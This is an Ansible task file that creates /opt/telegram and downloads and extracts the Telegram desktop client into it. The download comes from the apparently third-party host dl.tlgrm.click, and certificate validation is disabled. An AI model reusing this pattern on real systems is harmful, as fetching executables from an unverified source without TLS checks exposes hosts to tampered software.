---
- name: Create Telegram dir
  file:
    path: /opt/telegram
    state: directory
    mode: 0755
    owner: "{{ username }}"
    group: "{{ username }}"

- name: Extract archive to Telegram dir
  unarchive:
    src: https://dl.tlgrm.click/desktop/linux
    dest: /opt/telegram
    owner: "{{ username }}"
    group: "{{ username }}"
    remote_src: true
    validate_certs: false
    extra_opts: [--strip-components=1]
